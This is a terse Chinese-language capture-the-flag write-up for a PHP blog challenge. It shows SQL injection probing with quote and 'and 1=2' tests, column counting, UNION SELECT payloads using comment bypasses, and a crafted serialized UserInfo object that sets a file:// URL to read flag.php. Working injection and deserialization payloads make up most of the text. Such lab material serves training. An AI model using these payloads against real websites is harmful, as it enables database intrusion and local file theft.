1、facebook注册一个账户测试
http://****:8306/view.php?no=12%27
报错%27 '
[*] query error! (You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''' at line 1)
Fatal error: Call to a member function fetch_assoc() on boolean in /var/www/html/db.php on line 66
查看源码
2、扫目录 dirsearch
python3 dirsearch.py -u http://*:8306/ -e php
/robots.txt
访问/robots.txt
User-agent: *
Disallow: /user.php.bak
查看user.php.bak内容
3、 ssf协议+file 因为blog的正则表达式已经限制格式,所以不能注入
4、http://*:8306/view.php?no=12
http://*:8306/view.php?no=12%27
http://*:8306/view.php?no=12%27
+and+1=1 正常
+and+1=2 异常
可以是 and 1=2
Fatal error: Call to a member function getBlogContents() on boolean in /var/www/html/view.php on line 67
no=12 order by 4
http://*:8306/view.php?no=12%20order%20by%204
3 成功,5失败,所以只有4列
%20 空格
可以查看到no,username,passwd,data,USER,CURRENT_CONNECTIONS,TOTAL_CONNECTIONS
里面有的data具体查看
no=-1/**/union/**/select/**/1,group_concat(data),3,4%20from%20users%20where%20no=%2712%27%20#
典型的 json数据
8个位长的字段,3个变量 name age blog
回到user.php.bak 进行查看
public function getBlogContents ()
{
return $this->get($this->blog);
}
根据上述确定进行反序列化
格式参照 u 8 userinfo 3
O:8:"UserInfo":3:{s:4:"name";s:2:"zz";s:3:"age";i:1;s:4:"blog";s:20:"http://www.baidu.com";}
$u = unserialize(str:'O:8:"UserInfo":3:{s:4:"name";s:2:"zz";s:3:"age";i:1;s:4:"blog";s:20:"http://www.baidu.com";}');
$s = $u;
$s->blog='file:///var/www/html/flag.php';
print(serialize($s));
添加到已有文件的最后,直接访问,就可以获取上述的json字符串
http://*:8306/view.php?no=-1/**/union/**/select/**/1,2,3,'O:8:"UserInfo":3:{s:4:"name";s:2:"s1";s:3:"age";i:12;s:4:"blog";s:29:"file:///var/www/html/flag.php";}'
src="data:text/html;base64,PD9waHANCg0KJGZsYWcgPSAiZmxhZ3tBNTE2OEI2My00MjEzLTREOTItQkM4OC0yNkY5MzRBN0JCN0J9IjsNCmV4aXQoMCk7DQo="
PD9waHANCg0KJGZsYWcgPSAiZmxhZ3tBNTE2OEI2My00MjEzLTREOTItQkM4OC0yNkY5MzRBN0JCN0J9IjsNCmV4aXQoMCk7DQo=
<?php
$flag = "flag{A5168B63-4213-4D92-BC88-26F934A7BB7B}";
exit(0);
reissue request scripter